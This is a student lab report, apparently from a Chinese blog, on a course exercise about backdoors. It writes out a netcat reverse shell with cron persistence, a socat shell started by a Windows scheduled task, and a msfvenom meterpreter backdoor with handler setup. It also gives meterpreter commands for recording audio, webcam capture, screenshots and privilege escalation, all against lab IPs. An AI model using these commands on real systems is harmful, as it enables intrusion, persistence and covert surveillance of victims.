实验二:后门原理与实践
实验要求:
- 使用netcat获取主机操作Shell,cron启动。
- 使用socat获取主机操作Shell, 任务计划启动。
- 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机
- 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。
实验目的:
学习后门程序的原理,并自己动手实践,在实践中学习。
实验内容:
win获得Linux的shell
在win系统里使用cmd,使用ipconfig命令获取win的ip地址(192.168.159.137)
win等待监听端口4317,Linux系统反弹连接
首先要处于html路径下才能使用nc命令
此时已经获取了Linux的shell可以在win系统输入命令控制Linux
Linux下获取win的shell
和上一步操作十分类似只是主客体的变化以及命令的细微差距,都是实验netcat工具来完成。
获取Linuxip地址:192.168.159.134
win反弹连接,Linux获得shell
使用netcat获取主机shell,cron启动:
首先在win下启动cmd,对4317端口使用netcat进行监听(netcat.exe -l -e 4317)
这里需要使用Linux下的crontab,需要对其进行编辑,使用crontab -e 语句选择编译器进行编辑
对crontab的编辑操作和使用vi命令相似,有两种操作模式,编辑模式和命令模式,我们这里只需要把最后一行
进行编辑即可,推荐编辑成* * * * */bin/netcat 192.168.159.137 4317 -e /bin/sh 即每分钟都会自动启动。
这时候就可以在win下cmd键入指令控制Linux。
使用socat获取主机shell,任务计划启动
在win下搜索任务计划,新增任务计划对其进行编辑,首先编辑触发器,将开始任务选项选为工作站锁定时,
然后进行操作编辑,操作选择启动程序,并将路径选择socat.exe,并添加参数 tcp-listen:4317;exec:cmd.exe,pty,stderr
最后在任务计划程序中运行起此任务。
Linux下使用socat进行连接即可
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
首先生成后门程序,在Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=4312 -f exe > 20154312_backdoor.exe语句。
在通过netcat进行传输文件。
Linux下
win下
Linux下使用msfconsole语句进入msf控制台,使用监听模块,并配置ip和端口地址。
使用use exploit/multi/handler和 set payload windows/meterpreter/reverse_tcp进入payload设置。
然后使用show option查看设置,使用set LHOST LPORT来修改ip和端口。ip和端口应该为攻击机的ip和端口号。
最后执行监听
在win系统运行后门程序。
此时就已经取得了win的shell,我们就可以使用meterpreter的语句来进行操作了!
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
record_mic获取音频
webcam_snap使用摄像头拍照,但是出现了731错误,经多方查询还未解决
screenshot截屏
getuid查看当前用户,getsystem来提权。
实验总结:、
这次实验很有趣,有一种自己在做黑客入侵别人的电脑一样,很新奇,实验按照老师的指导书以及同学的帮助,慢慢做完,
整体对后门程序有了深刻的理解,唯一难解的问题就是在操作摄像头拍照时出现的问题不知道如何解决,很是苦恼,其他
部分只要理解了就不算特别困难,毕竟前人栽树,我做为后人只不过是在树下乘凉罢了。
原文地址:https://www.cnblogs.com/20154317wuhan/p/8673110.html